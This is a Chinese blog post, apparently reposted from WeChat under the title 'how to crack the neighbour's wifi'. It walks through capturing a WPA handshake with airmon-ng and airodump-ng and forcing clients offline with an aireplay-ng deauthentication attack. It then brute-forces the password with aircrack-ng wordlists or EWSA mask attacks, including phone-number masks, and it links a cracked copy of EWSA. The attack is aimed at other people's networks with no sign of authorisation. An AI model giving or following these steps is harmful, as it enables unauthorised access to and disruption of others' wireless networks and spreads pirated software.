如何破解wifi
0x01 准备
1.kali等操作系统2.支持监听模式的网卡,如RT3070、RTL81873.信号好的wifi,且该wifi有设备正在连接
0x02 获取握手包
1.将网卡连接到虚拟机2.使用iwconfig
查看网卡,一般为wlan0
1.使用airmon-ng start wlan0
开启监听模式2.再次使用iwconfig
查看网卡,查看网卡名称是否为wlan0mon
1.输入airodump-ng wlan0mon
扫描周围wifi信息,PWR越靠近0代表信号越强,下方的部分是连接到wifi的客户端。找到合适的wifi后需要记下CH BSSID
。
1.输入airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w ~/ wlan0mon
开始抓包,并将握手包保存到根目录下
1.使用aireplay-ng -0 2 -a BSSID -c STATION wlan0mon
将用户强制踢下线,用户下线后会自动连接wifi,届时即可抓到握手包。2.当抓到握手包的时候箭头处会显示”handshake“字样
0x03 破解握手包
推荐使用Windows下的ewsa进行破解,也可以使用hashcat等软件,不推荐aircrack。aircrack-ng使用的是cpu进行爆破,我i9-13900hx,给kali分配了4个核,爆破速度也才2000/s,使用4060+cpu+核显的爆破速度为40-45w/s。
aircrack-ng 破解握手包
aircrack-ng '/home/kali/Desktop/1.cap' -w /usr/share/wordlists/rockyou.txt
密码找到后如图所示:
hashcat 破解握手包
没玩明白,请参考https://blog.csdn.net/qq_29176323/article/details/115403581
使用显卡+hashcat破解握手包_显卡 跑 cap_千年恨的博客-CSDN博客[1]
EWSA破解握手包
下载地址:EWSA Pro最新版v7.40.821中文注册版 - 哔哩哔哩 (bilibili.com)[2]https://www.bilibili.com/read/cv23936832/
下载地址 链接:https://pan.baidu.com/s/1CJVjaOu8JvoRiEu89gJcmA?pwd=vlj1 提取码:vlj1
解压密码“500W专业跑包” 解压密码“500W专业跑包” 别再问了,消失的眼角膜啊~ 作者:LH丶tao https://www.bilibili.com/read/cv23936832/ 出处:bilibili
下载,安装,破解
导入tcpdump数据
点击破解选项
这边着重讲一下掩码破解,?d代表的就是0-9的任意数字,?d(0-3)代表的是0123这四个数字。假如我们要破解8位数字,则掩码为?d?d?d?d?d?d?d?d
,例如我们要破解130,131,132,133,134,135,136,137,138,139开头的手机号,则掩码为13?d?d?d?d?d?d?d?d?d
在选项处,选择cpu和gpu后,开始破解,等待爆破出密码
References
[1]
使用显卡+hashcat破解握手包_显卡 跑 cap_千年恨的博客-CSDN博客: https://blog.csdn.net/qq_29176323/article/details/115403581[2]
EWSA Pro最新版v7.40.821中文注册版 - 哔哩哔哩 (bilibili.com): https://www.bilibili.com/read/cv23936832/
原文始发于微信公众号(代码小铺):如何破解邻居wifi
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论